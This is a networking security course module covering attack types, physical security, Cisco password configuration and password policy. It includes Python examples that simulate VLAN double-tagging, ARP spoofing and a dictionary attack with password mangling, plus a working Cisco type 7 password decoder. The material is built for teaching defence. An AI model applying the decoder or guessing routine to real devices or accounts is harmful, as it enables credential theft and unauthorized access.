
Module 5: Security Fundamentals

• Lesson 1: Define key security concepts
• Lesson 2: Describe security program elements
• Lesson 3: Configure device access control using local passwords
• Lesson 4: Describe security password policies elements
• Lesson 5: Describe remote access and site-to-site VPNs
• Lesson 6: Configure and verify access control lists
• Lesson 7: Configure Layer 2 security features
• Lesson 8: Differentiate authentication, authorization, and accounting concepts
• Lesson 9: Describe wireless security protocols
• Lesson 10: Configure WLAN using WPA2 PSK using the GUI
Module 5: Security Fundamentals
Lesson 1: Define key security concepts

• Threats
• Vulnerabilities
• Exploits
• Mitigation techniques
Confidentiality, Integrity, Availability (CIA)
• Confidentiality – allowing access only to those who have been permitted and denying it to everyone else
  • Physical locks, safes, and firewalls can be used for confidentiality
  • Encryption at rest – stored data is encrypted so that only holders of the key can read it
  • Encryption in transit – data is encrypted as it travels across the network
• Integrity – how accurate the information is and whether it has been altered
  • Access control lists (ACLs) can prevent unauthorized access
  • The IPsec Authentication Header (AH) can protect data in transit against tampering
  • Hashing – data is run through a hash algorithm to generate a hash value, which is stored. When the file is read again, the hash algorithm is run again and the two values are compared; if they match, the file has not been altered. The stored hash must itself be protected, or an attacker who can change the file can also change the hash
• Availability – the 'uptime' of the devices that hold the data
  • Build in redundancy such as RAID, clustering, FHRP, and do backups to boost availability
Threats, Vulnerabilities and Exploits
• Threats
  • Potential danger to a company resource
  • Internal – coming from an employee inside the company, who may share private information or compromise internal systems
  • External – coming from outside the company and dependent on the company's connection to the outside world (Internet)
  • Threat actor – the person or group causing the threat (e.g., a hacker)
• Vulnerabilities
  • Security weaknesses
  • Physical – e.g., no keycard needed to get into protected areas
  • Network based – security weaknesses within applications, operating systems and networking devices
  • Patching mitigates vulnerabilities
  • Common Vulnerabilities and Exposures (CVE)
    • Provides a listing of publicly known vulnerabilities and exposures
  • Zero-day – a vulnerability that does not yet have a patch or workaround
• Exploits
  • A method that acts on a vulnerability
  • Usually a script or piece of software is used for the exploit
  • Check the CVE entry to find the patch or a method to block the exploit
• Least privilege
  • Restrict a user's level of access to the lowest level that still allows them to do their job
  • Mitigates internal threats, as it minimizes the overall access users have
• Role-based access
  • An improvement over detailing access rights for each file individually
  • Users are given one or more roles which give them specific and appropriate rights to resources
  • Roles could be, for example, user and admin
  • (Slide diagram: User → Role → Rights → Resource)
Common Vulnerabilities
• Unnecessary running services – disable all unnecessary services on a system. Any running service can be a vulnerability
• Open ports – TCP or UDP ports that are open on a system can be exploited. Close unneeded ports and use a firewall to restrict access to ports that need to stay open
• Unpatched systems – keep systems up to date with the latest patches and security fixes. Systems on old patch levels can be vulnerable
• Unencrypted sessions – encrypt communication sessions between systems as much as possible
• Clear-text credentials – use authentication protocols that encrypt (or never transmit) passwords
• Unsecure protocols – protocols such as HTTP, TFTP and SNMPv2 send traffic unencrypted. Use the secure form of these protocols, such as HTTPS, SFTP/SCP in place of TFTP, and SNMPv3
Malicious Software
• Virus – attached to a file; when the file is opened the virus is activated and infects the system
• Worm – self-replicating malware that can infect without a file being opened. It typically enters through software vulnerabilities and spreads itself to other systems
• Trojan – a program you run because you think it is legitimate. It commonly installs a backdoor (for example, opening a listening TCP port) that an external attacker can use to control the system
• Spyware – hidden software that monitors and collects information such as Internet browsing habits
• Adware – automatically loads advertisements on screen, often as pop-up windows
• Ransomware – takes control of a system (typically by encrypting its data) and does not give control back until a fee is paid
• Spam – unsolicited commercial email
• Logic bomb – planted on a system with the intention of doing damage later; it waits for a certain condition to exist before triggering
Mitigating Attacks
• Patch systems – have a patch management process in place. Up-to-date patches remove known vulnerabilities
• Encrypt network traffic – to guard your company's communications, encrypt network traffic wherever possible
• Encrypt data stored on mobile devices – in the event of losing a laptop, tablet, or smart phone, full-device encryption prevents someone from accessing sensitive data on the device
• Install antivirus software – in addition to running AV software, keep it up to date
• Use strong passwords – all user accounts and devices should use strong passwords
• Educate employees – employees need to be aware of the risks they take in not following proper security practices
• Run hashing algorithms – verify the integrity of data by running it through a hash algorithm and comparing the hash value with the original hash value
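As an added example (not part of the slide deck), the hash-based integrity check described above, run over a few constructed in-memory "files". It also shows the caveat a practitioner needs: an unkeyed hash catches accidental or naive changes, but an attacker who can rewrite the file can rewrite the stored hash too, so the manifest must be keyed (HMAC) or kept where the attacker cannot reach it. The file contents and the key are made up for the example.

```python
import hashlib
import hmac

# Constructed sample "files": name -> content bytes (not real configs).
FILES = {
    "startup-config": b"hostname R1\nenable secret 5 $1$example$hash\n",
    "ios-image.bin": b"\x7fELF constructed image bytes",
}

# Placeholder key; in practice it lives where the attacker cannot write
# (an HSM, a separate host, read-only media).
MANIFEST_KEY = b"example-key-not-for-production"


def sha256_manifest(files):
    """Unkeyed manifest: name -> SHA-256 hex digest of the content."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def hmac_manifest(files, key):
    """Keyed manifest: name -> HMAC-SHA-256 of the content under `key`."""
    return {name: hmac.new(key, data, hashlib.sha256).hexdigest()
            for name, data in files.items()}


def verify(files, manifest, key=None):
    """Return the sorted names whose current digest differs from the manifest
    (or that the manifest does not list). compare_digest is constant-time."""
    current = hmac_manifest(files, key) if key else sha256_manifest(files)
    return sorted(
        name for name, digest in current.items()
        if name not in manifest or not hmac.compare_digest(digest, manifest[name])
    )


def demo():
    baseline = sha256_manifest(FILES)
    keyed_baseline = hmac_manifest(FILES, MANIFEST_KEY)

    # 1. A two-byte change to a file is caught by either manifest.
    tampered = dict(FILES)
    tampered["startup-config"] = FILES["startup-config"].replace(b"R1", b"R2")

    # 2. An attacker who can write the file *and* the manifest recomputes the
    #    unkeyed hash, and the plain check passes. Without MANIFEST_KEY the best
    #    they can do is an HMAC under a guessed key, which still fails.
    forged_plain = sha256_manifest(tampered)
    forged_keyed = dict(keyed_baseline)
    forged_keyed["startup-config"] = hmac_manifest(
        tampered, b"attacker-guess")["startup-config"]

    return {
        "plain_detects": verify(tampered, baseline),
        "keyed_detects": verify(tampered, keyed_baseline, MANIFEST_KEY),
        "plain_fooled": verify(tampered, forged_plain),
        "keyed_still_detects": verify(tampered, forged_keyed, MANIFEST_KEY),
    }


if __name__ == "__main__":
    for check, changed in demo().items():
        print(f"{check}: {changed or 'nothing flagged'}")
```

The third result is the one to remember: a hash stored next to the data it protects proves nothing against an attacker with write access to both.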
Attack Types
Social Engineering Attacks
People want to be helpful when they feel someone is in need, and this trait can be exploited
• Gathering information from employees without them knowing about it
• Phishing
  • Attacker sends an email that looks legitimate but is hoping to harvest PII (personally identifiable information) or credentials
  • Spear phishing – targeted at a specific victim or group of victims
• Tailgating
  • When someone badges into a door and goes through, the attacker goes in after them before the door closes
• Piggybacking
  • Like tailgating, but the person opening the door never sees the attacker: the attacker waits (hides) until they can catch the door before it closes
• Shoulder Surfing
  • Watching someone type in sensitive information such as a username/password or credit card number
  • A privacy screen can mitigate this, as can being aware of your environment when entering sensitive information
Network based Attacks
• The attack uses technology such as the network and operating system to cause harm to the targeted company or companies
• DoS
  • Denial of service – attack used to disrupt a service a company offers or uses via the Internet
  • Sends massive amounts of false requests to a resource so that when a valid request is sent, it cannot get through
  • Types of DoS attacks:
    • Reflective
      • Attacker sends requests to a third-party server and forges the source address of the packets with the company's IP address
      • The third party responds to the victim!
      • Two victims: the third party that got used, and the attacked party
    • Amplified
      • Similar to reflective
      • Makes a small request to the third party that creates a large response to the victim
      • E.g., a small DNS query whose answer is many times larger than the request
    • Distributed (DDoS)
      • Most common
      • Uses many compromised machines ('bots', collectively a 'botnet') so that blocking a single bad source does not stop the attack
      • Uses a command and control server to control the bots
Network based Attacks
• On-Path Attack (Man in the middle)
  • Attacker positions itself between the host and the server without the host being aware
  • Able to 'watch' and even modify traffic between host and server. Can also impersonate either side
• DNS Poisoning
  • Attacker replaces legitimate DNS entries with a compromised server's IP address
  • The attacker floods the target DNS server with forged answers containing the bad actor's IP address while the target is waiting on a legitimate upstream DNS server; if a forged answer arrives first and matches the outstanding query, the target DNS server accepts and caches it
  • Not as effective today, as resolvers randomize query IDs and source ports, and DNSSEC (DNS Security Extensions) lets the resolver detect forged answers
• VLAN Hopping
  • Attacker moves from the VLAN they are currently assigned to in order to reach a system on another VLAN. Two ways to do this:
    • Switch spoofing – exploits a lazy switchport config: if the port is left in dynamic trunking mode (the default on many switches), the attacker can speak the trunking protocol (DTP) to negotiate a trunk link and then tag their frames with any VLAN that is allowed on the trunk
    • Double-tagging of VLANs – one-way attack – the attacker tags the frame with the VLAN they are in (outer tag) and also with the intended VLAN (inner tag). This only works when the attacker's VLAN is the native VLAN of the trunk: the first switch removes the outer tag (native VLAN traffic is sent untagged) and forwards the frame, and the next switch sees the inner tag and delivers it into the intended VLAN. The victim gets the packet, but replies cannot take the return trip. You can DoS with this
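The double-tagging case described above, as an added example that is not part of the deck: it builds an 802.1Q double-tagged frame and models just enough of a trunk's egress and ingress behaviour (native VLAN sent untagged, untagged frames classified into the native VLAN) to show why the attack works only when the attacker's access VLAN equals the trunk's native VLAN. MAC addresses, VLAN numbers and payload are constructed; the switch model ignores everything else (MAC learning, STP, allowed-VLAN lists).

```python
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def build_frame(dst, src, vlans, payload, ethertype=ETHERTYPE_IPV4):
    """Ethernet II frame with zero or more stacked 802.1Q tags (outer first)."""
    header = dst + src
    for vid in vlans:
        header += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)  # PCP/DEI = 0
    return header + struct.pack("!H", ethertype) + payload


def vlan_tags(frame):
    """Return the stacked VLAN IDs of a frame, outermost first."""
    tags, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == TPID_8021Q:
        tags.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4
    return tags


def strip_outer_tag(frame):
    """Remove the 4-byte tag that follows the 12-byte MAC header."""
    return frame[:12] + frame[16:]


def trunk_egress(frame, native_vlan):
    """Trunk egress: the native VLAN is sent untagged, everything else keeps
    its tag. An outer tag equal to the native VLAN is therefore removed, which
    exposes the inner (attacker-chosen) tag to the next switch."""
    tags = vlan_tags(frame)
    if tags and tags[0] == native_vlan:
        return strip_outer_tag(frame)
    return frame


def trunk_ingress_vlan(frame, native_vlan):
    """Trunk ingress: tagged frames belong to their outer tag, untagged
    frames belong to the native VLAN."""
    tags = vlan_tags(frame)
    return tags[0] if tags else native_vlan


def double_tag_attack(attacker_vlan, target_vlan, trunk_native_vlan):
    """Attacker in `attacker_vlan` sends a frame tagged [attacker_vlan,
    target_vlan] toward the trunk. Returns the VLAN in which the downstream
    switch delivers the frame."""
    frame = build_frame(b"\xff" * 6, b"\x02\x00\x00\x00\x00\x01",
                        [attacker_vlan, target_vlan], b"constructed payload")
    on_wire = trunk_egress(frame, trunk_native_vlan)        # switch 1 -> trunk
    return trunk_ingress_vlan(on_wire, trunk_native_vlan)   # switch 2 classifies


if __name__ == "__main__":
    # Native VLAN equals the attacker's VLAN: the frame lands in VLAN 20.
    print("native VLAN 10 :", double_tag_attack(10, 20, trunk_native_vlan=10))
    # Mitigation: an unused native VLAN that no access port belongs to.
    print("native VLAN 999:", double_tag_attack(10, 20, trunk_native_vlan=999))
```

With the native VLAN moved to an unused ID, the outer tag survives the trunk and the frame stays in the attacker's own VLAN, which is the configuration change the Layer 2 security lesson recommends.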
Network based Attacks
• ARP Spoofing
  • Address Resolution Protocol (ARP) resolves an IP address to a MAC address
  • A host broadcasts an ARP request when it does not know the MAC address for a destination IP address; the attacker answers with a spoofed ARP reply
  • Used in combination with an on-path attack. The attacker first learns the default gateway's IP address, then sends a forged gratuitous ARP (GARP) claiming that IP. GARP is normally used to notify hosts when a MAC address changes and the IP-to-MAC mapping needs to be updated. The victim receives the packet and updates its ARP entry for the gateway IP address to the attacker's MAC. The attacker can then accept packets that were intended for the default gateway, read the contents, and pass them on to the real default gateway
• Rogue DHCP
  • Attacker deploys a DHCP server that hands out bad IP addresses, which can cause a DoS because a client with a bad IP won't be able to use the network
  • Can also be used to redirect traffic through the attacker's machine by changing the default gateway (or DNS server), which is provided by a DHCP option
  • The attacker can then watch traffic and capture login information and other sensitive data as it passes through their machine
• Rogue Access Point
  • An AP that provides unauthorized Wi-Fi access separate from the corporate Wi-Fi. Gives the attacker the ability to be on the network from outside the building, without needing a wired connection
  • Port security on the switchport (and 802.1X authentication of whatever plugs in) mitigates this threat
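The ARP spoofing scenario above, and the check that defeats it, as an added example (not from the deck): first what a host's ARP cache does with no protection (the latest reply wins), then a miniature version of the validation that Dynamic ARP Inspection performs against a DHCP snooping binding table, run over constructed ARP packets. Port names, addresses and the binding table are made up.

```python
from dataclasses import dataclass

GATEWAY_IP = "10.0.0.1"
GATEWAY_MAC = "00:11:22:33:44:01"

# Constructed DHCP-snooping binding table (ip -> mac) learned from DHCP ACKs,
# plus the statically known gateway. Only the uplink port is trusted.
BINDINGS = {
    "10.0.0.1": "00:11:22:33:44:01",   # gateway (static entry)
    "10.0.0.50": "00:aa:bb:cc:dd:50",  # victim, learned from DHCP
    "10.0.0.66": "00:aa:bb:cc:dd:66",  # attacker's own lease
}
TRUSTED_PORTS = {"Gi0/24"}             # uplink toward the router


@dataclass
class Arp:
    port: str         # ingress switch port
    op: str           # "request" or "reply"
    sender_ip: str
    sender_mac: str
    target_ip: str


def naive_cache_update(cache, pkt):
    """What a host does without any inspection: the latest ARP wins."""
    cache[pkt.sender_ip] = pkt.sender_mac
    return cache


def inspect(pkt, bindings=BINDINGS, trusted=TRUSTED_PORTS):
    """Return (allow, reason). Trusted ports are not inspected; on untrusted
    ports the sender IP/MAC pair must match the binding table."""
    if pkt.port in trusted:
        return True, "trusted port"
    bound_mac = bindings.get(pkt.sender_ip)
    if bound_mac is None:
        return False, f"no binding for {pkt.sender_ip}"
    if bound_mac.lower() != pkt.sender_mac.lower():
        kind = "gratuitous" if pkt.sender_ip == pkt.target_ip else pkt.op
        return False, (f"{kind} ARP claims {pkt.sender_ip} is at "
                       f"{pkt.sender_mac}, binding says {bound_mac}")
    return True, "matches binding"


def run(packets):
    """Inspect a sequence of ARP packets; return one verdict per packet."""
    return [inspect(p) for p in packets]


# Constructed traffic: a legitimate request/reply for the gateway, then the
# attacker's forged gratuitous ARP for the gateway IP, then a claim for an
# address that was never leased.
SAMPLE = [
    Arp("Gi0/5", "request", "10.0.0.50", "00:aa:bb:cc:dd:50", GATEWAY_IP),
    Arp("Gi0/24", "reply", GATEWAY_IP, GATEWAY_MAC, "10.0.0.50"),
    Arp("Gi0/7", "reply", GATEWAY_IP, "00:aa:bb:cc:dd:66", GATEWAY_IP),
    Arp("Gi0/7", "reply", "10.0.0.99", "00:aa:bb:cc:dd:66", "10.0.0.50"),
]

if __name__ == "__main__":
    cache = {}
    for pkt in SAMPLE[1:3]:
        naive_cache_update(cache, pkt)
    print("unprotected host now maps gateway to", cache[GATEWAY_IP])
    for pkt, (ok, why) in zip(SAMPLE, run(SAMPLE)):
        print("ALLOW" if ok else "DROP ", pkt.port, pkt.sender_ip, "-", why)
```

The unprotected cache ends up pointing the gateway at the attacker's MAC after one forged packet; the inspection step drops that same packet because the (IP, MAC) pair contradicts what DHCP handed out.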
Network based Attacks
• Evil Twin
  • Wi-Fi phishing attack
  • Attacker sets up an AP that looks just like the organization's Wi-Fi (same SSID)
  • Uses a stronger signal so that clients prefer it
• Ransomware
  • Locks and encrypts a device until a ransom fee is paid
  • Usually starts when a phishing email link or attachment is opened
  • Payment is demanded in cryptocurrency such as Bitcoin because it is hard (though not impossible) to trace
  • Recommendation is not to pay the ransom, as paying keeps this type of attack alive; restore from backups instead
• Password Attacks
  • Attacker guesses common passwords for common usernames such as admin, administrator, root, etc.
  • Dictionary attacks – use a list of common words, plus variants such as passw0rd
  • Brute-force attacks – try every combination of characters
  • Use passwords that are at least 10 characters long, not a common word, and mix upper case, lower case, numbers and special characters!
Network based Attacks
• MAC Spoofing
  • Used to bypass network access control that relies on MAC Authentication Bypass (MAB), which is used in networks that allow self-registration, sometimes for BYOD environments
  • The user registers their device by its MAC address; the network sees that MAC, lets it bypass the normal authentication and gives it a VLAN assignment
  • The attacker learns the user's MAC address (it is sent in clear text in every frame), assigns it to their own device, and they have access!
• IP Spoofing
  • Attacker impersonates an IP address that is already assigned to another device
  • Used in DoS attacks to conceal the attacker's actual IP address (and in reflection attacks to direct the replies at the victim)
• Deauthentication
  • Wireless uses a deauthentication frame when a client leaves the network
  • Attacker sends deauthentication frames on behalf of the user, which disconnects them from the access point
  • Used in conjunction with an evil twin so that once the user is deauthenticated they reconnect to the malicious AP
  • Protected management frames (802.11w, mandatory in WPA3) authenticate deauthentication frames and defeat this
• Malware
  • Software with malicious intent (the general term)
  • A virus is a specific type of malware whose purpose is to multiply, infect and do harm
  • Malware covers other forms such as ransomware, which is among the biggest threats today
Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists

• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,


local passwords authorization, and accounting concepts

• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Module 5: Security Fundamentals
Lesson 2: Describe security program elements

• User awareness
• Training
• Physical access control

• User awareness
• Not sharing passwords
• Use strong passwords
• Keep doors shut and locked
• Keep desk clean
• Don’t click links from untrusted
sources
Prevention methods
• Employee Training
  • Preventative and proactive measure to increase employee education
  • Boosts security awareness
• Access Control Hardware
  • Badges
    • Identification badges – provide proof of access to others
    • Proper process and procedure must be in place for the enforcement of badges
  • Biometrics
    • Fingerprints, retina scans, voice recognition, facial recognition
  • Locking Racks
    • Racks that networking equipment is kept in should be locked to prevent unauthorized access and inadvertent powering down of devices
  • Locking Cabinets
    • Filing cabinets hold sensitive company information and should be locked
  • Access Control Vestibule (also known as a mantrap)
    • Small room with two controlled doors
    • Once you have entered door 1, you cannot enter door 2 until access is granted
    • Prevents tailgating and piggybacking
  • Smart Lockers
    • Amazon deliveries!
    • Electronically controlled lockers that hold your package and give you access after you scan a delivery code
Detection methods
Lets you know what happened, when it happened and who did it
• Camera
  • Fixed – best for surveillance purposes
  • Pan-tilt-zoom (PTZ) – can give a 360 degree view and is used for intervention, but can miss the incident as it occurs
• Video surveillance
  • Coaxial cable
    • Used in environments where coax has already been run, or where long runs that Ethernet cannot support are needed
    • Called closed circuit television (CCTV)
    • Storage is usually directly attached (DAS)
  • Ethernet
    • IP surveillance – becoming the standard
    • Camera can be placed anywhere an Ethernet cable can be run, and can also take advantage of Power over Ethernet (PoE)
    • A network video recorder (NVR) is the recording system; it uses network attached storage (NAS) or a storage area network (SAN) for storage
    • Can do license plate recognition (LPR)
    • Media converter – can be used to bring coax cameras onto Ethernet
Detection methods
• Motion Detection
  • Passive infrared (PIR) – most common due to price. Monitors the amount of infrared radiation from several zones
  • Microwave detectors are more expensive and used where wide coverage is needed
  • Vibration sensors are mostly used for seismic purposes
• Asset Tracking Tags
  • Track, secure, locate and identify organization assets
  • Two types:
    • Passive RFID – the tag has no battery; a powered reader energizes it with an RF signal and the tag responds with its unique ID
    • Active RFID – battery-powered transmitter; can use Wi-Fi, Bluetooth or RFID
      • The Wi-Fi version can be tracked by the wireless controller
• Tamper Detection
  • Indicates a system has been compromised in some way
  • Non-electrical – a security strip that displays a mark when peeled off
  • Electrical – uses a micro switch on the case cover
    • If the case is opened, an SNMP trap is sent
  • Think of an alarm system placed on the door to a room which contains network equipment: an unauthorized person enters and the alarm sounds
Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists

• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,


local passwords authorization, and accounting concepts

• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Module 5: Security Fundamentals
Lesson 3: Configure device access control using local passwords

• Configure device access control using local passwords
Username and Password Options
• No username or password
  • Least secure
  • Cisco IOS refuses remote (VTY) logins until a line password, or login local with a user account, is configured
• Static username and password
  • Manually set on each network device
  • Does not expire
• Username and password with expiration
  • Like static, but configured to expire at a certain point and must be changed before then
• One-time password (OTP)
  • Very secure
  • Each password is derived from a shared secret and is valid for a single login, so a captured password cannot be replayed
• Token cards
  • Most secure of the options listed
  • Users get a token card and a PIN (something they have plus something they know)
Username and Password Configuration
• Passwords are set in five places on Cisco devices
  • Console, auxiliary, Telnet (VTY), enable password, and enable secret
  • Enable password and enable secret secure privileged mode
• Character-mode access
  • Most common, and called line authentication
  • Uses different passwords depending on the line the user is connecting through
Username and Password Configuration
• Enable passwords
  • enable password – sets the privileged-mode password and stores it in clear text in the configuration. Exists for older IOS releases (pre 10.3) that lacked enable secret
  • enable secret – stored as a hash rather than in clear text, and overrides the enable password when both are set
• User-mode passwords
  • Set under the lines
  • line console 0 – sets the console user-mode password
  • line vty 0 15 – sets the Telnet/SSH password on the device
  • line aux 0 – sets the password for the auxiliary port, which is used for modem connections
  • exec-timeout 0 0 – sets the idle timeout to zero so the session never times out (convenient in a lab; keep a real timeout on production devices)
  • logging synchronous – when console messages pop up, you are returned to the device prompt without your input being interrupted. Very helpful!
Telnet password
• line vty 0 15 – enters configuration for the 16 virtual terminal lines
• password <password> – sets the VTY (Telnet) password
• login – requires the line password at login
• You can then connect from another IOS device, a PC command line, or an application such as PuTTY with: telnet <IP address of device>
• Telnet sends the password and the whole session in clear text; prefer SSH (transport input ssh) where the image supports it
Encrypting passwords
• When doing a show run, your passwords can be seen in clear text, except the enable secret, which is stored as a hash by default
• service password-encryption obfuscates the other passwords in the configuration (type 7). This is reversible and protects only against someone glancing at the screen, not against anyone who obtains a copy of the config
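As an added example (not from the deck), here is why service password-encryption should be read as obfuscation: Cisco's type 7 scheme is a fixed-key XOR, and its decoding routine is public and a few lines long. The code below implements encode and decode and pulls every `password 7` value out of a constructed show-run excerpt; the string 0822455D0A16 is the commonly cited type 7 encoding of the password cisco, and the second value in the excerpt is generated by the example itself. Keep configs out of reach regardless, and use enable secret (a one-way hash) for the privileged-mode password.

```python
import re

# The fixed XOR key used by the type 7 scheme (public knowledge, 53 bytes).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
PASSWORD7_RE = re.compile(r"\bpassword 7 ([0-9A-Fa-f]{4,})")


def type7_decrypt(encoded: str) -> str:
    """The first two decimal digits give the starting key offset; each
    following hex byte is XORed with successive key bytes."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


def type7_encrypt(plain: str, seed: int = 8) -> str:
    """Inverse of type7_decrypt; IOS picks seeds in 0..15."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    data = plain.encode("ascii")
    enc = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                for i, b in enumerate(data))
    return f"{seed:02d}{enc.hex().upper()}"


def recover_from_config(config: str):
    """Return [(encoded, plaintext), ...] for every `password 7` in the text."""
    return [(enc, type7_decrypt(enc)) for enc in PASSWORD7_RE.findall(config)]


# Constructed show-run excerpt (not from a real device). The enable password
# value is produced here by type7_encrypt so the example is self-checking.
SAMPLE_CONFIG = f"""\
enable password 7 {type7_encrypt('Lab-Secret1', seed=3)}
line vty 0 4
 password 7 0822455D0A16
 login
"""

if __name__ == "__main__":
    for enc, plain in recover_from_config(SAMPLE_CONFIG):
        print(f"{enc} -> {plain}")
```

Anyone who can read a backed-up or emailed configuration can do the same, which is why the config file itself has to be treated as a secret.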
Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists

• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,


local passwords authorization, and accounting concepts

• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Module 5: Security Fundamentals
Lesson 4: Describe security password policies elements

• Management
• Complexity
• Password alternatives
• Multifactor authentication
• Certificates
• Biometrics
Password Management
Setting strong passwords
• Should be as long as possible
• Minimum of 10 characters
• Calculations can be made to determine how quickly a password can be compromised: the number of candidates is the character-set size raised to the password length, divided by the attacker's guess rate
• The longer and more complex the password, the longer it will take an attacker to compromise it
Password expiration
• The longer a password is used, the more likely it is to have been compromised
• Require users to reset passwords every 30 days (note that current NIST SP 800-63B guidance drops scheduled rotation in favor of long passphrases, screening against breached-password lists, and forcing a change only on evidence of compromise)
• Prevent the re-use of previously used passwords
Password Management
Password Complexity
• Align your password complexity requirements to the technical capabilities of the workforce
• Password policies can be set at domain level using Group Policy objects
• Find the balance between users being able to manage their own passwords and the security level
• Use lowercase, uppercase, numbers and special characters
• A longer, simpler password is better than a shorter, complex one
What NOT to use
• The word password
• Proper names
• Pet's name
• Children's names
• Any word in the dictionary
• License plate number
• Street name
• Birthdates
• Company name
Screensaver Required Password
• The screensaver should come on after a given amount of idle time, and a password should be required to exit it
Password Management
Password Management Features
• Automatic account lockouts
  • Can be set to lock the account after a certain number of un
  successful attempts
  • Stops attackers' scripts from brute-forcing an account
  • An admin should manually unlock the account (rather than having the system do it automatically); be aware that an attacker who knows usernames can then lock legitimate users out, which is itself a denial of service
• Password expiration and password histories
  • Even good passwords don't do well over time
  • Set passwords to expire after a certain amount of time (30 – 45 days)
  • Ensure the password history holds enough passwords that users cannot re-use them
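The password attacks listed under Lesson 1 (dictionary with variants, brute force), the keyspace calculation mentioned under "Setting strong passwords", and the automatic lockout above, as one added example that is not part of the deck: a dictionary attack with common substitutions is run against a constructed account store, first without and then with a lockout, and the keyspace arithmetic shows why "longer beats more complex". Hashing is PBKDF2 from the standard library with a deliberately low iteration count; usernames, passwords, the wordlist and the assumed guess rate are made up.

```python
import hashlib
import hmac
import os

ITERATIONS = 1_000  # kept small so the demo runs quickly; use far more in production


def hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


class AccountStore:
    """Salted-hash credential store with an optional lockout after N failures."""

    def __init__(self, users, lockout_threshold=None):
        self.users = {}
        for name, pw in users.items():
            salt = os.urandom(16)
            self.users[name] = {"salt": salt, "hash": hash_pw(pw, salt), "failures": 0}
        self.threshold = lockout_threshold

    def login(self, name, password):
        """Return "ok", "bad" or "locked"."""
        u = self.users.get(name)
        if u is None:
            return "bad"
        if self.threshold is not None and u["failures"] >= self.threshold:
            return "locked"
        if hmac.compare_digest(hash_pw(password, u["salt"]), u["hash"]):
            u["failures"] = 0
            return "ok"
        u["failures"] += 1
        return "bad"


LEET = {"a": "@4", "e": "3", "i": "1!", "o": "0", "s": "$5"}


def variants(word):
    """The word plus common mangles: capitalisation, one leet substitution,
    and popular suffixes. Real wordlist rules are far richer than this."""
    bases = {word, word.capitalize(), word.upper()}
    for b in list(bases):
        for i, ch in enumerate(b):
            for sub in LEET.get(ch.lower(), ""):
                bases.add(b[:i] + sub + b[i + 1:])
    for b in sorted(bases):
        yield b
        for suffix in ("1", "123", "!", "2024"):
            yield b + suffix


def dictionary_attack(store, username, wordlist):
    """Online guessing. Return (password or None, attempts made, locked_out)."""
    attempts = 0
    for word in wordlist:
        for guess in variants(word):
            attempts += 1
            result = store.login(username, guess)
            if result == "ok":
                return guess, attempts, False
            if result == "locked":
                return None, attempts, True
    return None, attempts, False


def brute_force_years(length, charset_size, guesses_per_second=1e10):
    """Worst-case time to exhaust the keyspace at an assumed offline cracking
    rate (1e10/s is a plausible GPU rig against a fast, unsalted hash)."""
    return charset_size ** length / guesses_per_second / (3600 * 24 * 365)


WORDLIST = ["welcome", "admin", "password", "cisco"]           # constructed
USERS = {"admin": "P@ssword1", "svc-backup": "Xk7#qL9v!mZ2"}   # constructed

if __name__ == "__main__":
    print("no lockout:   ", dictionary_attack(AccountStore(USERS), "admin", WORDLIST))
    print("lockout at 5: ", dictionary_attack(AccountStore(USERS, 5), "admin", WORDLIST))
    print("strong pw:    ", dictionary_attack(AccountStore(USERS), "svc-backup", WORDLIST))
    for length, size in ((8, 95), (10, 95), (16, 26)):
        print(f"{length} chars from {size} symbols: {brute_force_years(length, size):.3g} years")
```

"P@ssword1" satisfies every complexity rule on the previous slide and still falls to a four-word list with trivial mangling; the lockout stops that online attack after five guesses, but it does nothing against an offline attack on a stolen hash, which is what the keyspace figures describe. Note that a 16-character lowercase passphrase has a far larger keyspace than a 10-character one drawn from all 95 printable characters.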
Single Sign-On
• Today there are many systems that users need to sign in to
• Users can get frustrated by having to remember passwords for all these systems and may resort to unsafe security practices for convenience
• Single Sign-On (SSO) solves this by using an access token that is generated when the user signs on to the domain
• The access token identifies the user and the groups they belong to, which determine the resources (folders, databases, websites, etc.) they are authorized to access
• Whenever the user reaches one of these resources, the token is verified, allowing the user in without having to type in credentials again
Local Authentication
• When the user logs in, they authenticate against the local user database with their local account
• On Windows the local database is called the Security Accounts Manager (SAM)
• On Linux, account information is stored in the text file /etc/passwd (the "password file"); the password hashes themselves are kept in /etc/shadow, which only root can read
LDAP
• Lightweight Directory Access Protocol (LDAP) is derived from the earlier X.500 directory standard; it is a simpler protocol to implement while still exposing the directory's rich set of attributes
• Hierarchy of users, groups, systems, servers, client workstations, etc.
• The directory can be used by many applications because it holds data about users and other network entities
